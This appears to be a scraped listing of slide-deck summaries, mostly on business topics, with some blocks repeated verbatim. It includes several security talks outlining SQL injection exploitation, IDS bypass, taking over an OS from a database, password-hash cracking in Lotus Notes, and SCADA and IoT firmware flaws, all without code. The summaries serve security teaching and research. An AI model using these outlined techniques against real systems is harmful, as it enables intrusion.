This document summarizes Tim Brown's presentation on auditing big UNIX systems. Some key challenges with auditing these systems include limited access to systems, varying operating system capabilities between versions, and differences in audit methodologies. Better techniques for auditing include developing better scripting tools, performing gap analyses between audit methodologies, and leveraging common configuration enumerations. Going further requires understanding why auditing is needed, analyzing the full attack surface of systems, and considering real world complexities like operating system flaws and accumulating application features.
HIS'15 website tells us "Our lives increasingly depend on the correct functioning of software". But whilst true in itself, software is just one of the links in a system-chain; each needing to be as strong as the others for a satisfactory outcome. History may have branded software as the weakest link, but can that be said today? A system is an entity complete in its context; and judged subjectively by its black-box behaviour. And when faced with its failure it isn't acceptable to claim that "my bit worked"! All technologies we utilise are fallible, as are the processes we use to create them: Hardware, Software, Optics, Acoustics, RF, Mechanics, Test, Reproduction, Maintenance ... Perfection is still reserved for the gods. Technologies must work together in the system, and historic silos do nothing to encourage this. So how good do systems need to be; how close to achieving it are we; and does one size fit all? And perhaps most challengingly, can the disciplines complement one another so the whole is stronger than the weakest links?
This document provides an overview of the global energy industry and Royal Dutch Shell's position within it. It analyzes industry trends, Shell's operations and competitors, scenarios for future energy demand, and Shell's strategies. The document compares a "Scramble" scenario of uncoordinated development to Shell's preferred "Blueprints" scenario of coordinated investment and policy to transition to a lower carbon future.
London, Paris, and Frankfurt remain the top three cities for business according to the European Cities Monitor survey. Easy access to markets, customers, and clients is the most important factor for companies in deciding where to locate. Berlin saw the biggest improvement in the rankings this year, rising six places. The survey provides insights into factors influencing business location decisions and the relative attractiveness and competitiveness of major European cities.
This curriculum vitae summarizes the professional experience and qualifications of Ahmed Hussien. He has over 10 years of experience in sales management roles within the water systems industry in Qatar, Egypt, and GCC markets. His most recent role was as Divisional Manager of the Water Systems Division at Tadmur Trading W.L.L. in Qatar, where he was responsible for managing sales, projects, services, and growth of the division. He holds a B.Sc. in Mechanical Power Engineering from Helwan University in Cairo, Egypt.
DKSH is a Swiss market expansion services group founded in the 1860s through the merging of three companies established by Swiss entrepreneurs who sailed to Asia to conduct business. DKSH operates across 36 countries in Asia Pacific and Europe, employing over 28,000 people. In 2015, DKSH generated annual net sales of CHF 10.1 billion and net income of CHF 199.6 million through its operations supporting clients' market access across various industries.
Cushman & Wakefield market beat report Q.2 2013Trang Le
This report provides a summary of the Hanoi, Vietnam office and retail market conditions in Q2 2013. Grade B office supply continued to increase with two new buildings adding 32,000 sqm, while Grade A supply remained unchanged. Average asking rents for Grade B declined slightly while Grade A rates remained stable. Retail supply was unchanged in Q2, while average asking rents and occupancy rates held steady. Several new office and retail developments are scheduled to deliver over 800,000 sqm of additional space in the next two years.
The Case for Global Strategic and Collaborative Support for IsraelYael Simon
Sir Mick Davis delivers an uncompromising approach and a clarion call to philanthropists worldwide to address Israel's Domestic needs by examining the existential threats from the outside of the country to understand how to solve the internal challenges. It is through the support of Haredi Employment that he supports this notion and a channel to best harness all the strengths of the State of Israel - welfare, poverty, education, social cohesion, the economy and peace within the country.
Oakmont Limited provides business and finance services, document and records management solutions, and has expertise implementing the Concur expense management system for clients. They have over 30 years of experience working with major corporations in industries like manufacturing, services, and utilities. The company profiles several employees who have relevant roles, expertise, and experience delivering solutions to clients across different organizations and industries.
HIS'15 website tells us "Our lives increasingly depend on the correct functioning of software". But whilst true in itself, software is just one of the links in a system-chain; each needing to be as strong as the others for a satisfactory outcome. History may have branded software as the weakest link, but can that be said today? A system is an entity complete in its context; and judged subjectively by its black-box behaviour. And when faced with its failure it isn't acceptable to claim that "my bit worked"! All technologies we utilise are fallible, as are the processes we use to create them: Hardware, Software, Optics, Acoustics, RF, Mechanics, Test, Reproduction, Maintenance ... Perfection is still reserved for the gods. Technologies must work together in the system, and historic silos do nothing to encourage this. So how good do systems need to be; how close to achieving it are we; and does one size fit all? And perhaps most challengingly, can the disciplines complement one another so the whole is stronger than the weakest links?
This document provides an overview of the global energy industry and Royal Dutch Shell's position within it. It analyzes industry trends, Shell's operations and competitors, scenarios for future energy demand, and Shell's strategies. The document compares a "Scramble" scenario of uncoordinated development to Shell's preferred "Blueprints" scenario of coordinated investment and policy to transition to a lower carbon future.
London, Paris, and Frankfurt remain the top three cities for business according to the European Cities Monitor survey. Easy access to markets, customers, and clients is the most important factor for companies in deciding where to locate. Berlin saw the biggest improvement in the rankings this year, rising six places. The survey provides insights into factors influencing business location decisions and the relative attractiveness and competitiveness of major European cities.
This curriculum vitae summarizes the professional experience and qualifications of Ahmed Hussien. He has over 10 years of experience in sales management roles within the water systems industry in Qatar, Egypt, and GCC markets. His most recent role was as Divisional Manager of the Water Systems Division at Tadmur Trading W.L.L. in Qatar, where he was responsible for managing sales, projects, services, and growth of the division. He holds a B.Sc. in Mechanical Power Engineering from Helwan University in Cairo, Egypt.
DKSH is a Swiss market expansion services group founded in the 1860s through the merging of three companies established by Swiss entrepreneurs who sailed to Asia to conduct business. DKSH operates across 36 countries in Asia Pacific and Europe, employing over 28,000 people. In 2015, DKSH generated annual net sales of CHF 10.1 billion and net income of CHF 199.6 million through its operations supporting clients' market access across various industries.
Cushman & Wakefield market beat report Q.2 2013Trang Le
This report provides a summary of the Hanoi, Vietnam office and retail market conditions in Q2 2013. Grade B office supply continued to increase with two new buildings adding 32,000 sqm, while Grade A supply remained unchanged. Average asking rents for Grade B declined slightly while Grade A rates remained stable. Retail supply was unchanged in Q2, while average asking rents and occupancy rates held steady. Several new office and retail developments are scheduled to deliver over 800,000 sqm of additional space in the next two years.
The Case for Global Strategic and Collaborative Support for IsraelYael Simon
Sir Mick Davis delivers an uncompromising approach and a clarion call to philanthropists worldwide to address Israel's Domestic needs by examining the existential threats from the outside of the country to understand how to solve the internal challenges. It is through the support of Haredi Employment that he supports this notion and a channel to best harness all the strengths of the State of Israel - welfare, poverty, education, social cohesion, the economy and peace within the country.
Oakmont Limited provides business and finance services, document and records management solutions, and has expertise implementing the Concur expense management system for clients. They have over 30 years of experience working with major corporations in industries like manufacturing, services, and utilities. The company profiles several employees who have relevant roles, expertise, and experience delivering solutions to clients across different organizations and industries.
This document discusses DS Smith's brand management process and a campaign to raise awareness of zero waste. It overviews DS Smith's previous branding issues and a new 6-step brand management process. It then details a multi-channel campaign around the theme of achieving zero waste, including content creation, webinars, and analytics on website traffic, leads generated, and external recognition received.
The document discusses the growth of online retailing globally and its implications for physical retail space. It finds that while online retail is growing rapidly worldwide, the development of online markets varies between countries due to differences in infrastructure, technology adoption, culture and regulations. Retailers are increasingly pursuing multichannel strategies to capture online sales. For physical retail property, online growth is driving some retailers to reduce store counts or space needs, while others are pursuing smaller format stores, changing the optimal retail network. Large shopping centers remain well positioned by offering experiences, services and fulfillment options that complement online shopping.
The establishment of the Single Supervisory Mechanism is the first step towards a European Banking Union. The ECB will take responsibility for bank supervision in November 2014. Before then, the ECB will conduct an assessment of around 130 large banks through an Asset Quality Review and stress test. It is important that the ECB's assessment is seen as credible by capital markets in order to boost confidence in banks. However, there is a risk that a very tough assessment could undermine some governments' ability to recapitalize national banks. The ECB aims to enhance transparency, strengthen bank balance sheets, and rebuild trust. But a remaining issue is establishing a credible public backstop for banks through a Single Resolution Mechanism.
National Disaster Management In AfghanistanABU_DRRGroup
This document outlines Afghanistan's national disaster management framework. It discusses the country's vulnerability to natural hazards like floods, droughts, and earthquakes. The National Disaster Management Authority (ANDMA) coordinates disaster response and works with provincial offices and line ministries. Key activities include conducting damage assessments, providing emergency relief, and establishing emergency operation centers. ANDMA has also developed disaster management plans and conducted public awareness campaigns. Moving forward, challenges remain around limited resources, security issues, and developing early warning systems.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Eicher Motors is an Indian automotive company that owns Royal Enfield motorcycles and has a joint venture called VE Commercial Vehicles. The document provides an overview of Eicher Motors' businesses and their operations. It discusses Royal Enfield motorcycles and their growth in India and globally. It also outlines VE Commercial Vehicles, which designs and markets trucks and buses through its brands Eicher Trucks and Buses and Volvo Trucks India. The joint venture was formed to modernize commercial transportation in India. The document then analyzes VE Commercial Vehicles' international business and provides a project overview to study competitors' distribution networks in African and Middle Eastern markets.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
The document discusses performance appraisal, which is a method for evaluating an employee's performance in areas such as quality, quantity, cost and time. It outlines several aims of performance appraisal including providing feedback to employees, identifying training needs, and forming the basis for personnel decisions. The document also discusses different performance appraisal methods such as management by objectives and 360 degree feedback, which involves collecting feedback from subordinates, peers and managers. It notes debates around performance appraisal and both benefits and challenges to implementing 360 degree feedback in organizations.
El documento proporciona una introducción al protocolo SMTP y a los registros DNS más importantes. Explica que SMTP se utiliza para el envío de correo electrónico a través de puertos TCP e incluye extensiones como ESMTP. También describe los roles de los servidores MTA, MUA y MDA en el proceso de envío de correo, así como los registros DNS clave como A, MX, CNAME, TXT, NS, SOA y PTR.
Containers, Docker, and Security: State Of The Union (LinuxCon and ContainerC...Jérôme Petazzoni
Containers, Docker, and Security: State of the Union
This document discusses the past, present, and future of container security with Docker. It summarizes that container isolation used to be a major concern but improvements have been made through finer-grained permissions and immutable containers. Image provenance is now a bigger issue but techniques like Docker Content Trust (Notary) help address it. Defense in depth with both containers and VMs is recommended. The security of containers continues to improve through practices like better upgrades, security benchmarks, and policies.
The document discusses memory forensics and rootkit detection. It covers why memory forensics is important for malware analysis and incident response. Key topics include memory acquisition tools, the Volatility memory forensics framework, rootkit techniques like DLL injection, hooking, and process/driver hiding used by malware. Detection methods for these rootkit behaviors using Volatility plugins are also presented. The document appears to be from a security training presentation on memory forensics and rootkit analysis.
The document summarizes key points from Day 1 of DockerCon. It discusses Docker's mission to build tools for mass innovation and how they are taking an incremental approach to reinventing the programmer's toolbox. New tools like Docker, Docker Compose, Docker Machine, Docker Swarm, Docker Networking plugins and Notary were introduced to help solve problems around runtimes, packaging, service composition, machine management, clustering, networking and security. Docker is also donating runC to the Open Container Project and forming the Open Container Project to establish open standards around container formats and governance.
Why defensive research is sexy too.. … and a real sign of skillOllie Whitehouse
This document discusses the importance and challenges of defensive cybersecurity research. It notes that while offensive research may be easier due to exploitable technology vulnerabilities, defensive research is important for protecting systems and data from attackers. Defensive research involves efforts like finding and mitigating vulnerabilities, developing detection and response capabilities, understanding evolving attack techniques, and improving security standards and implementations. The document outlines many open challenges in areas like phishing, malware, memory corruption, and forensics. It argues that to be successful, defensive ideas must be practical, scalable, cost-effective, and widely adopted. The rewards of defensive research are more intangible compared to offensive research, but are still very important for enhancing security.
Eris Industries - American Banker presentation deck. Preston Byrne
Eris Industries' deck (and a recording of the talk) describing our view of where the blockchain space is going in the next couple of years. Any questions, ping Preston directly.
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamMITRE ATT&CK
From ATT&CKcon 3.0
By Brian Donohue, Red Canary
This presentation will highlight the Atomic Red Team project's efforts to define and increase the test coverage of MITRE ATT&CK techniques. We'll describe the challenges we encountered in defining what "coverage" means in the context of an ATT&CK-based framework, and how to use that definition to improve an open source project that's used by a diverse audience of practitioners to satisfy an equally diverse array of needs. The audience will learn how the Atomic Red Team maintainers standardize and categorize atomic tests, perform gap analysis to achieve deep technique-level coverage and broad matrix-level coverage, and quickly fill those gaps with new tests.
This document provides an overview of exploiting insecure IoT firmware. It begins with an introduction to IoT protocols like CoAP, MQTT, XMPP, and AMQP. It then discusses the OWASP top 10 security risks for IoT, focusing on insecure software/firmware. Common debugging interfaces for firmware like UART, JTAG, SPI, and I2C are explained. Operating systems and compilers used for IoT development are listed. Finally, the document outlines a methodology for exploiting insecure firmware, including getting the firmware, performing reconnaissance, unpacking, localizing points of interest, and then decompiling, compiling, tweaking, fuzzing, or pentesting the firmware. Tools mentioned include binwalk, firmwalk
How to write clean & testable code without losing your mindAndreas Czakaj
If you create software that is to be developed continuously over several years you'll need a sustainable approach to code quality.
In our early days of AEM development, however, we used to struggle with code that is rigid, hard to test and full of LOG.debug calls.
In this talk I will share some development best practices we have found that really work in actual AEM based software, e.g. to achieve 100% code coverage and provide high confidence in the code base.
Spoiler alert: no new libraries, frameworks or tools are required - once you know the ideas, plain old TDD and the S.O.L.I.D. principles of Clean Code will do the trick.
by Andreas Czakaj, mensemedia Gesellschaft für Neue Medien mbH
Presented at the adaptTo() 2017 conference in Berlin (https://adapt.to/2017/en/schedule/how-to-write-clean---testable-code-without-losing-your-mind.html).
Presentation video can be found on YouTube (https://www.youtube.com/watch?v=JbJw5oN_zL4)
This document discusses modeling interoperation between devices in intelligent domotic environments. It proposes using an ontology called DogOnt to formally model devices and their interconnections in a technology-independent way. Rules for interoperation can be automatically generated from this model to allow communication between devices that use different networks or protocols. The approach was tested on a real-world setup with KNX and MyOpen devices, generating 58 rules with negligible runtime overhead. Modeling interconnections at a high level supports more flexible automation design and dynamic composition of device functions.
This document summarizes a keynote about Docker's goals of making hardware programmable through containers and open standards. The keynote discusses Docker's goals of reinventing the programmer's toolbox by solving problems like runtime, packaging, composition and networking incrementally. It also discusses building better infrastructure plumbing and promoting open standards through projects like runC, Notary, the Open Container Project and more. The goal is to help organizations solve problems in unique ways through an open developer platform and standards.
Professional Software Development, Practices and EthicsLemi Orhan Ergin
The document discusses professional software development practices and ethics. It begins by showing code for hacking into a system using SSH and resetting the root password. It then discusses disabling grid nodes in a system. The rest of the document discusses the experience and background of Lemi Orhan Ergin, a senior software engineer, including his education and work history. It also provides an agenda for a presentation on how to become an ethical software developer, covering topics like waterfall development, Agile development, software craftsmanship practices, ethics in software engineering, and ethics in development.
This document discusses DS Smith's brand management process and a campaign to raise awareness of zero waste. It overviews DS Smith's previous branding issues and a new 6-step brand management process. It then details a multi-channel campaign around the theme of achieving zero waste, including content creation, webinars, and analytics on website traffic, leads generated, and external recognition received.
The document discusses the growth of online retailing globally and its implications for physical retail space. It finds that while online retail is growing rapidly worldwide, the development of online markets varies between countries due to differences in infrastructure, technology adoption, culture and regulations. Retailers are increasingly pursuing multichannel strategies to capture online sales. For physical retail property, online growth is driving some retailers to reduce store counts or space needs, while others are pursuing smaller format stores, changing the optimal retail network. Large shopping centers remain well positioned by offering experiences, services and fulfillment options that complement online shopping.
The establishment of the Single Supervisory Mechanism is the first step towards a European Banking Union. The ECB will take responsibility for bank supervision in November 2014. Before then, the ECB will conduct an assessment of around 130 large banks through an Asset Quality Review and stress test. It is important that the ECB's assessment is seen as credible by capital markets in order to boost confidence in banks. However, there is a risk that a very tough assessment could undermine some governments' ability to recapitalize national banks. The ECB aims to enhance transparency, strengthen bank balance sheets, and rebuild trust. But a remaining issue is establishing a credible public backstop for banks through a Single Resolution Mechanism.
National Disaster Management In AfghanistanABU_DRRGroup
This document outlines Afghanistan's national disaster management framework. It discusses the country's vulnerability to natural hazards like floods, droughts, and earthquakes. The National Disaster Management Authority (ANDMA) coordinates disaster response and works with provincial offices and line ministries. Key activities include conducting damage assessments, providing emergency relief, and establishing emergency operation centers. ANDMA has also developed disaster management plans and conducted public awareness campaigns. Moving forward, challenges remain around limited resources, security issues, and developing early warning systems.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Eicher Motors is an Indian automotive company that owns Royal Enfield motorcycles and has a joint venture called VE Commercial Vehicles. The document provides an overview of Eicher Motors' businesses and their operations. It discusses Royal Enfield motorcycles and their growth in India and globally. It also outlines VE Commercial Vehicles, which designs and markets trucks and buses through its brands Eicher Trucks and Buses and Volvo Trucks India. The joint venture was formed to modernize commercial transportation in India. The document then analyzes VE Commercial Vehicles' international business and provides a project overview to study competitors' distribution networks in African and Middle Eastern markets.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
The document discusses performance appraisal, which is a method for evaluating an employee's performance in areas such as quality, quantity, cost and time. It outlines several aims of performance appraisal including providing feedback to employees, identifying training needs, and forming the basis for personnel decisions. The document also discusses different performance appraisal methods such as management by objectives and 360 degree feedback, which involves collecting feedback from subordinates, peers and managers. It notes debates around performance appraisal and both benefits and challenges to implementing 360 degree feedback in organizations.
El documento proporciona una introducción al protocolo SMTP y a los registros DNS más importantes. Explica que SMTP se utiliza para el envío de correo electrónico a través de puertos TCP e incluye extensiones como ESMTP. También describe los roles de los servidores MTA, MUA y MDA en el proceso de envío de correo, así como los registros DNS clave como A, MX, CNAME, TXT, NS, SOA y PTR.
Containers, Docker, and Security: State Of The Union (LinuxCon and ContainerC...Jérôme Petazzoni
Containers, Docker, and Security: State of the Union
This document discusses the past, present, and future of container security with Docker. It summarizes that container isolation used to be a major concern but improvements have been made through finer-grained permissions and immutable containers. Image provenance is now a bigger issue but techniques like Docker Content Trust (Notary) help address it. Defense in depth with both containers and VMs is recommended. The security of containers continues to improve through practices like better upgrades, security benchmarks, and policies.
The document discusses memory forensics and rootkit detection. It covers why memory forensics is important for malware analysis and incident response. Key topics include memory acquisition tools, the Volatility memory forensics framework, rootkit techniques like DLL injection, hooking, and process/driver hiding used by malware. Detection methods for these rootkit behaviors using Volatility plugins are also presented. The document appears to be from a security training presentation on memory forensics and rootkit analysis.
The document summarizes key points from Day 1 of DockerCon. It discusses Docker's mission to build tools for mass innovation and how they are taking an incremental approach to reinventing the programmer's toolbox. New tools like Docker, Docker Compose, Docker Machine, Docker Swarm, Docker Networking plugins and Notary were introduced to help solve problems around runtimes, packaging, service composition, machine management, clustering, networking and security. Docker is also donating runC to the Open Container Project and forming the Open Container Project to establish open standards around container formats and governance.
Why defensive research is sexy too.. … and a real sign of skillOllie Whitehouse
This document discusses the importance and challenges of defensive cybersecurity research. It notes that while offensive research may be easier due to exploitable technology vulnerabilities, defensive research is important for protecting systems and data from attackers. Defensive research involves efforts like finding and mitigating vulnerabilities, developing detection and response capabilities, understanding evolving attack techniques, and improving security standards and implementations. The document outlines many open challenges in areas like phishing, malware, memory corruption, and forensics. It argues that to be successful, defensive ideas must be practical, scalable, cost-effective, and widely adopted. The rewards of defensive research are more intangible compared to offensive research, but are still very important for enhancing security.
Eris Industries - American Banker presentation deck. Preston Byrne
Eris Industries' deck (and a recording of the talk) describing our view of where the blockchain space is going in the next couple of years. Any questions, ping Preston directly.
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamMITRE ATT&CK
From ATT&CKcon 3.0
By Brian Donohue, Red Canary
This presentation will highlight the Atomic Red Team project's efforts to define and increase the test coverage of MITRE ATT&CK techniques. We'll describe the challenges we encountered in defining what "coverage" means in the context of an ATT&CK-based framework, and how to use that definition to improve an open source project that's used by a diverse audience of practitioners to satisfy an equally diverse array of needs. The audience will learn how the Atomic Red Team maintainers standardize and categorize atomic tests, perform gap analysis to achieve deep technique-level coverage and broad matrix-level coverage, and quickly fill those gaps with new tests.
This document provides an overview of exploiting insecure IoT firmware. It begins with an introduction to IoT protocols like CoAP, MQTT, XMPP, and AMQP. It then discusses the OWASP top 10 security risks for IoT, focusing on insecure software/firmware. Common debugging interfaces for firmware like UART, JTAG, SPI, and I2C are explained. Operating systems and compilers used for IoT development are listed. Finally, the document outlines a methodology for exploiting insecure firmware, including getting the firmware, performing reconnaissance, unpacking, localizing points of interest, and then decompiling, compiling, tweaking, fuzzing, or pentesting the firmware. Tools mentioned include binwalk, firmwalk
How to write clean & testable code without losing your mindAndreas Czakaj
If you create software that is to be developed continuously over several years you'll need a sustainable approach to code quality.
In our early days of AEM development, however, we used to struggle with code that is rigid, hard to test and full of LOG.debug calls.
In this talk I will share some development best practices we have found that really work in actual AEM based software, e.g. to achieve 100% code coverage and provide high confidence in the code base.
Spoiler alert: no new libraries, frameworks or tools are required - once you know the ideas, plain old TDD and the S.O.L.I.D. principles of Clean Code will do the trick.
by Andreas Czakaj, mensemedia Gesellschaft für Neue Medien mbH
Presented at the adaptTo() 2017 conference in Berlin (https://adapt.to/2017/en/schedule/how-to-write-clean---testable-code-without-losing-your-mind.html).
Presentation video can be found on YouTube (https://www.youtube.com/watch?v=JbJw5oN_zL4)
This document discusses modeling interoperation between devices in intelligent domotic environments. It proposes using an ontology called DogOnt to formally model devices and their interconnections in a technology-independent way. Rules for interoperation can be automatically generated from this model to allow communication between devices that use different networks or protocols. The approach was tested on a real-world setup with KNX and MyOpen devices, generating 58 rules with negligible runtime overhead. Modeling interconnections at a high level supports more flexible automation design and dynamic composition of device functions.
This document summarizes a keynote about Docker's goals of making hardware programmable through containers and open standards. The keynote discusses Docker's goals of reinventing the programmer's toolbox by solving problems like runtime, packaging, composition and networking incrementally. It also discusses building better infrastructure plumbing and promoting open standards through projects like runC, Notary, the Open Container Project and more. The goal is to help organizations solve problems in unique ways through an open developer platform and standards.
Professional Software Development, Practices and EthicsLemi Orhan Ergin
The document discusses professional software development practices and ethics. It begins by showing code for hacking into a system using SSH and resetting the root password. It then discusses disabling grid nodes in a system. The rest of the document discusses the experience and background of Lemi Orhan Ergin, a senior software engineer, including his education and work history. It also provides an agenda for a presentation on how to become an ethical software developer, covering topics like waterfall development, Agile development, software craftsmanship practices, ethics in software engineering, and ethics in development.
This document summarizes a presentation about testing security in a Lotus Notes environment. The presentation covered breaking into a Lotus Notes/Domino system from external and internal perspectives. It demonstrated how to crack password hashes from documents, use cracked credentials to access additional databases and run commands, and upload a database shell to gain access to the operating system. The presentation warned that employees may pose one of the biggest security threats.
This document summarizes a talk given by Celil ÜNÜVER on vulnerabilities found in SCADA software. It begins with ÜNÜVER's background in security research. It then discusses how interest in SCADA security increased after Stuxnet in 2010. ÜNÜVER explains how he found many vulnerabilities by reversing SCADA software with little attention to security. Specific exploitation cases are presented, including vulnerabilities in CoDeSys, Progea MOVICON, Schneider Electric systems, and InduSoft HMI software. ÜNÜVER concludes that critical infrastructure systems are attractive targets for hackers due to their insecurity if connected to the internet.
1. The document discusses best practices for writing clean code in Jupyter notebooks, including breaking large notebooks into smaller ones focused on a single hypothesis-data-interpretation loop, creating a shared library for utilities, and writing each code cell to have a single logical output.
2. Key tips include organizing the notebook structure with sections for importing, getting data, modeling, visualization, and interpretation. Notebooks should be kept small with 4-10 cells each.
3. Clean code in Jupyter notebooks reads like well-written prose, with each cell presenting one clear idea, execution, and output.
Is Android the New Embedded Embedded Linux? at Embedded World 2013Opersys inc.
Android is increasingly being used in embedded systems due to its feature set, large developer community, and permissive licensing. However, there are still challenges to using Android for embedded projects, including limited documentation, inability to fully customize the software stack, long build times, and dependency on continued support from Google. Future trends may see Google and other companies continuing to adapt Android for more embedded and headless use cases.
Everything you've been told about blockchains is wrong: the "killer app" isn't any particular implementation, but the database design itself. In this presentation I explain how the permissioned blockchain design pioneered by Eris Industries actually addresses the problems and use-cases everyone's said blockchains can solve, but hasn't actually used them to solve.
Hint: it's not because of "decentralisation."
Containers, docker, and security: state of the union (Bay Area Infracoders Me...Jérôme Petazzoni
Docker is two years old. While security has always been at the core of the questions revolving around Docker, the nature of those questions has changed. Last year, the main concern was "can I safely colocate containers on the same machine?" and it elicited various responses. Dan Walsh, SELinux expert, notoriously said: "containers do not contain!", and at last year's LinuxCon, Jérôme delivered a presentation detailing how to harden Docker and containers to isolate them better. Today, people have new concerns. They include image transport, vulnerability mitigation, and more.
After a recap about the current state of container security, Jérôme will explain why those new questions showed up, and most importantly, how to address them and safely deploy containers in general, and Docker in particular.
Unembedding embedded systems with TDD: Benefits of going beyond the make it w...Francisco Climent Pérez
Slides of my talk 'Unembedding embedded systems with TDD: Benefits of going beyond the make it work phase' during the First International Test-Driven Development Conference, 10th July, 2021.
Complete event talks can be seen here:
https://www.youtube.com/watch?v=-_noEVCR__I
My talk starts at: 4:19:38
IoT Development from Software Developer PerspectiveAndri Yadi
My talk for IoT Bandung - MeetUp #15 event. As software developer, I share how to improve software development process when developing for IoT device, especially Arduino.
Civil engineers build structures to last. Aerospace engineers build airplanes for the long haul. Automotive engineers build cars to last. How about software engineers?
Not all of software needs to be engineered for long-life, but in some systems the predicted market span dictates we plan for the future. How can we do this, given the uncertainties in the technology industry?
What can we learn from the past?
How can we take informed bets on technologies and plan for change?
This session will cover some of the important technical considerations to make when thinking about the long term.
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...44CON
Your job is to secure operations. But nobody listens to you. There’s no budget. Management keeps making bad security decisions that seem to sabotage your efforts. Do you flee or do you try harder? The security books, blogs, and tweeting pundits out there tell us we need to learn the language of business. We need to put risk in terms of money that management understands. We need to be like the management we’re trying to protect. And that’s where it all falls apart. The security to business relationship is often textbook abusive codependency. You do well and nobody notices. You fail and you get fired or worse- shamed by your peers over social media for whatever the company releases as the statement for the breach. So how do you do SecOps under those conditions? This talk will focus on new ways to approach SecOps to face the challenges you have today with business demands. We will look at new security research that will make a difference for how you do your job. Most of all we will show you technical security practices to help you sustain your new found stance.
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...44CON
One of the hottest topics in current crypto research is Post-Quantum Cryptography. This branch of cryptography addresses asymmetric crypto systems that are not prone to quantum computers.
Virtually all asymmetric crypto systems currently in use (Diffie-Hellman, RSA, DSA, and Elliptic Curve Crypto Systems) are not Post-Quantum. They will be useless, once advanced quantum computers will be available. Quantum computer technology has made considerable progress in recent years, with major organisations, like Google, NSA, and NASA, investing in it.
Post-Quantum Cryptography uses advanced mathematical concepts. Even if one knows the basics of current asymmetric cryptography (integer factorisation, discrete logarithms, …), Post-Quantum algorithms are hard to understand.
The goal of this presentation is to explain Post-Quantum Cryptography in a way that is comprehensible for non-mathematicians. Five families of crypto systems (as good as all known Post-Quantum algorithms belong to these) will be introduced:
Lattice-based systems:
The concept of lattice-based asymmetric encryption will be explained with a two-dimensional grid (real-world implementations use 250 dimensions and more). Some lattice-based ciphers (e.g., New Hope) make use of the Learning with Error (LWE) concept. I will demonstrate LWE encryption in a way that is understandable to somebody who knows Gaussian elimination (this is taught at middle school). Other lattice-based systems (especially NTRU) use truncated polynomials, which I will also explain in a simple way.
Code-based systems:
McEliece and a few other asymmetric ciphers are based on error correction codes. While teaching the whole McEliece algorithm might be too complex for a 44CON presentation, it is certainly possible to explain error correction codes and the main McEliece fundamentals.
Non-commutative systems:
There are nice ways to explain non-commutative groups and the crypto systems based on these, using everyday-life examples. Especially, twisting a Rubik’s Cube and plaiting a braid are easy-to-understand group operations a crypto system can be built on.
Multivariate systems:
Multivariate crypto can be explained to somebody who knows Gaussian elimination.
Hash-based signatures: If properly explained, Hash-based signatures are easier to understand than any other asymmetric crypto scheme.
I will explain these systems with cartoons, drawings, photographs, a Rubik’s Cube and other items.
In addition, I will give a short introduction to quantum computers and the current Post-Quantum Crypto Competition (organised by US authority NIST).
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...44CON
This document discusses the capabilities of SmartNICs and how they can address challenges in modern data centers. It describes how SmartNICs can offload processing tasks from servers to improve efficiency. It also explains how SmartNICs provide security benefits through isolation and embedded computing functions. The document provides examples of how SmartNICs can implement network functions like firewalls through open virtual switch software and customized packet processing rules. It suggests SmartNICs could potentially access host memory to gain visibility into the server for monitoring and security applications while running analysis functions in an isolated trusted domain on the SmartNIC.
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...44CON
Exploits, Backdoors, and Hacks: words we do not commonly hear when speaking of Machine Learning (ML). In this talk, I will present the relatively new field of hacking and manipulate machine learning systems and the potential these techniques pose for active offensive research.
The study of Adversarial ML allows us to leverage the techniques used by these algorithms to find weak points and exploit them in order to achieve:
Unexpected consequences (why did it decide this rifle is a banana?)
Data leakage (how did they know Joe has diabetes)
Memory corruption and other exploitation techniques (boom! RCE)
Influence the output
In other words, while ML is great at identifying and classifying patterns, an attacker can take advantage of this and take control of the system.
This talk is an extension of research made by many people, including presenters at DefCon, CCC, and others – a live demo will be shown on stage!
Garbage In, RCE Out :)
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...44CON
Numerous technical articles, presentations, and even books exists about reverse engineering the Windows Driver Model (WDM) for purposes that vary from simply understanding how a specific driver works, to malware analysis and bug hunting. On the other hand, Microsoft has been providing the Kernel Mode Driver Framework (KMDF) for quite a while and we now see more and more drivers shifting to this framework instead of interacting directly with the OS like in the old WDM times. Yet, there is close to no information on how to approach this model from a reverse engineering and offensive standpoint.
In this presentation, I will first do a quick recap on WDM drivers, its common structures, and how to identify its entry points. Then I’ll introduce KMDF with all its relevant functions for reverse engineering through a set of case-studies. I’ll describe how to interact with a KMDF device object through SetupDI api and how to find and analyze the different IO queues dispatch routines. Does the framework actually enhances security? We’ll come to a conclusion after revealing some major vendor implementation problems.
Armed with this knowledge, you will be able to run your own bug hunting session over any KMDF driver.
The UK's Code of Practice for Security in Consumer IoT Products and Services ...44CON
